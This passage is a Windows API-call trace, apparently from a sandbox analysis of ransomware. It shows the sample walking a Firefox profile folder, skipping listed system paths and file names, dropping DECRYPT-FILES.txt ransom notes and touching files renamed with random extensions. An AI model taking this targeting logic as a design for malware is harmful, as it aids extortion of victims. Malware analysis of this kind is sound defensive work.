HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.498] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="mimeTypes.rdf.CrlkH8j" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.CrlkH8j") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.CrlkH8j" [0184.499] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.499] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.CrlkH8j" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf.crlkh8j"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.499] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=4091) returned 1 [0184.499] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.499] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.513] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.513] CloseHandle (hObject=0x288) returned 1 [0184.513] CloseHandle (hObject=0x284) returned 1 [0184.513] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.513] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xacccfd80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xacccfd80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="minidumps", cAlternateFileName="MINIDU~1")) returned 1 [0184.513] lstrcmpW (lpString1="minidumps", lpString2=".") returned 1 [0184.513] lstrcmpW (lpString1="minidumps", lpString2="..") returned 1 [0184.513] lstrcatW (in: lpString1="minidumps", lpString2="\\" | out: lpString1="minidumps\\") returned="minidumps\\" [0184.513] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="minidumps\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\" [0184.513] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\Program Files") returned 0x0 [0184.513] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch=":\\Windows") returned 0x0 [0184.513] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\Games\\") returned 0x0 [0184.513] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.513] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.513] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.513] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.513] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.513] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\All Users") returned 0x0 [0184.513] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.513] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.514] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.514] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="AhnLab") returned 0x0 [0184.514] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.514] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\") returned 98 [0184.514] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.514] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\\\0a16c9.tmp") returned 109 [0184.514] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\minidumps\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0184.515] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\") returned 98 [0184.515] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.515] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\\\DECRYPT-FILES.txt") returned 116 [0184.515] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\minidumps\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.515] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\") returned 98 [0184.515] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*" [0184.515] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf0afd5e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0afd5e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0184.515] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0184.515] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf0afd5e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0afd5e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.515] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0184.515] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0184.515] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf0afd5e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf0afd5e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0afd5e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0184.515] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0184.516] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0184.516] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0184.516] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0184.516] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0184.516] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0184.516] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0184.516] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0184.516] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0184.516] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0184.516] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.516] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0184.516] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0184.516] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0184.516] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0184.516] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\") returned 98 [0184.516] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.516] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\" [0184.516] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\0a16c9.tmp" [0184.516] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.516] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\minidumps\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.516] CloseHandle (hObject=0x0) returned 0 [0184.516] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.517] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacccfd80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xacccfd80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xacccfd80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.517] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.517] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacccfd80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xacccfd80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xacccfd80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0184.517] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0184.517] CloseHandle (hObject=0x284) returned 1 [0184.517] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x80696ec0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="parent.lock", cAlternateFileName="PARENT~1.LOC")) returned 1 [0184.517] lstrcmpiW (lpString1="parent.lock", lpString2="DECRYPT-FILES.txt") returned 1 [0184.517] lstrcmpiW (lpString1="parent.lock", lpString2="autorun.inf") returned 1 [0184.517] lstrcmpiW (lpString1="parent.lock", lpString2="boot.ini") returned 1 [0184.517] lstrcmpiW (lpString1="parent.lock", lpString2="desktop.ini") returned 1 [0184.517] lstrcmpiW (lpString1="parent.lock", lpString2="ntuser.dat") returned 1 [0184.517] lstrcmpiW (lpString1="parent.lock", lpString2="iconcache.db") returned 1 [0184.517] lstrcmpiW (lpString1="parent.lock", lpString2="bootsect.bak") returned 1 [0184.517] lstrcmpiW (lpString1="parent.lock", lpString2="ntuser.dat.log") returned 1 [0184.517] lstrcmpiW (lpString1="parent.lock", lpString2="thumbs.db") returned -1 [0184.517] lstrcmpiW (lpString1="parent.lock", lpString2="Bootfont.bin") returned 1 [0184.517] lstrlenW (lpString="parent.lock") returned 11 [0184.517] lstrcmpiW (lpString1="lock", lpString2="lnk") returned 1 [0184.517] lstrcmpiW (lpString1="lock", lpString2="exe") returned 1 [0184.517] lstrcmpiW (lpString1="lock", lpString2="sys") returned -1 [0184.517] lstrcmpiW (lpString1="lock", lpString2="dll") returned 1 [0184.517] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.517] lstrlenW (lpString="parent.lock") returned 11 [0184.517] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.517] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="parent.lock" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" [0184.517] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.518] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.529] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=0) returned 1 [0184.529] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0184.529] CloseHandle (hObject=0x0) returned 0 [0184.529] CloseHandle (hObject=0x284) returned 1 [0184.529] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.529] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb43eb830, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb43eb830, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xacd68300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10108, dwReserved0=0x0, dwReserved1=0x0, cFileName="permissions.sqlite.eoyVu", cAlternateFileName="PERMIS~1.EOY")) returned 1 [0184.529] lstrcmpiW (lpString1="permissions.sqlite.eoyVu", lpString2="DECRYPT-FILES.txt") returned 1 [0184.530] lstrcmpiW (lpString1="permissions.sqlite.eoyVu", lpString2="autorun.inf") returned 1 [0184.530] lstrcmpiW (lpString1="permissions.sqlite.eoyVu", lpString2="boot.ini") returned 1 [0184.530] lstrcmpiW (lpString1="permissions.sqlite.eoyVu", lpString2="desktop.ini") returned 1 [0184.530] lstrcmpiW (lpString1="permissions.sqlite.eoyVu", lpString2="ntuser.dat") returned 1 [0184.530] lstrcmpiW (lpString1="permissions.sqlite.eoyVu", lpString2="iconcache.db") returned 1 [0184.530] lstrcmpiW (lpString1="permissions.sqlite.eoyVu", lpString2="bootsect.bak") returned 1 [0184.530] lstrcmpiW (lpString1="permissions.sqlite.eoyVu", lpString2="ntuser.dat.log") returned 1 [0184.530] lstrcmpiW (lpString1="permissions.sqlite.eoyVu", lpString2="thumbs.db") returned -1 [0184.530] lstrcmpiW (lpString1="permissions.sqlite.eoyVu", lpString2="Bootfont.bin") returned 1 [0184.530] lstrlenW (lpString="permissions.sqlite.eoyVu") returned 24 [0184.530] lstrcmpiW (lpString1="eoyVu", lpString2="lnk") returned -1 [0184.530] lstrcmpiW (lpString1="eoyVu", lpString2="exe") returned -1 [0184.530] lstrcmpiW (lpString1="eoyVu", lpString2="sys") returned -1 [0184.530] lstrcmpiW (lpString1="eoyVu", lpString2="dll") returned 1 [0184.530] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.530] lstrlenW (lpString="permissions.sqlite.eoyVu") returned 24 [0184.530] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.530] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="permissions.sqlite.eoyVu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.eoyVu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.eoyVu" [0184.530] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.530] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.eoyVu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite.eoyvu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.530] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=65800) returned 1 [0184.531] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.531] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.531] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.531] CloseHandle (hObject=0x288) returned 1 [0184.531] CloseHandle (hObject=0x284) returned 1 [0184.532] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.532] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4c1a3d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4c1a3d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xad0d42a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa00108, dwReserved0=0x0, dwReserved1=0x0, cFileName="places.sqlite.3Naa7O", cAlternateFileName="PLACES~1.3NA")) returned 1 [0184.532] lstrcmpiW (lpString1="places.sqlite.3Naa7O", lpString2="DECRYPT-FILES.txt") returned 1 [0184.532] lstrcmpiW (lpString1="places.sqlite.3Naa7O", lpString2="autorun.inf") returned 1 [0184.532] lstrcmpiW (lpString1="places.sqlite.3Naa7O", lpString2="boot.ini") returned 1 [0184.532] lstrcmpiW (lpString1="places.sqlite.3Naa7O", lpString2="desktop.ini") returned 1 [0184.532] lstrcmpiW (lpString1="places.sqlite.3Naa7O", lpString2="ntuser.dat") returned 1 [0184.532] lstrcmpiW (lpString1="places.sqlite.3Naa7O", lpString2="iconcache.db") returned 1 [0184.532] lstrcmpiW (lpString1="places.sqlite.3Naa7O", lpString2="bootsect.bak") returned 1 [0184.532] lstrcmpiW (lpString1="places.sqlite.3Naa7O", lpString2="ntuser.dat.log") returned 1 [0184.532] lstrcmpiW (lpString1="places.sqlite.3Naa7O", lpString2="thumbs.db") returned -1 [0184.532] lstrcmpiW (lpString1="places.sqlite.3Naa7O", lpString2="Bootfont.bin") returned 1 [0184.532] lstrlenW (lpString="places.sqlite.3Naa7O") returned 20 [0184.532] lstrcmpiW (lpString1="3Naa7O", lpString2="lnk") returned -1 [0184.532] lstrcmpiW (lpString1="3Naa7O", lpString2="exe") returned -1 [0184.532] lstrcmpiW (lpString1="3Naa7O", lpString2="sys") returned -1 [0184.532] lstrcmpiW (lpString1="3Naa7O", lpString2="dll") returned -1 [0184.532] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.532] lstrlenW (lpString="places.sqlite.3Naa7O") returned 20 [0184.532] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.532] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="places.sqlite.3Naa7O" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.3Naa7O") returned="C:\\Users\\5p5NrGJn0jS 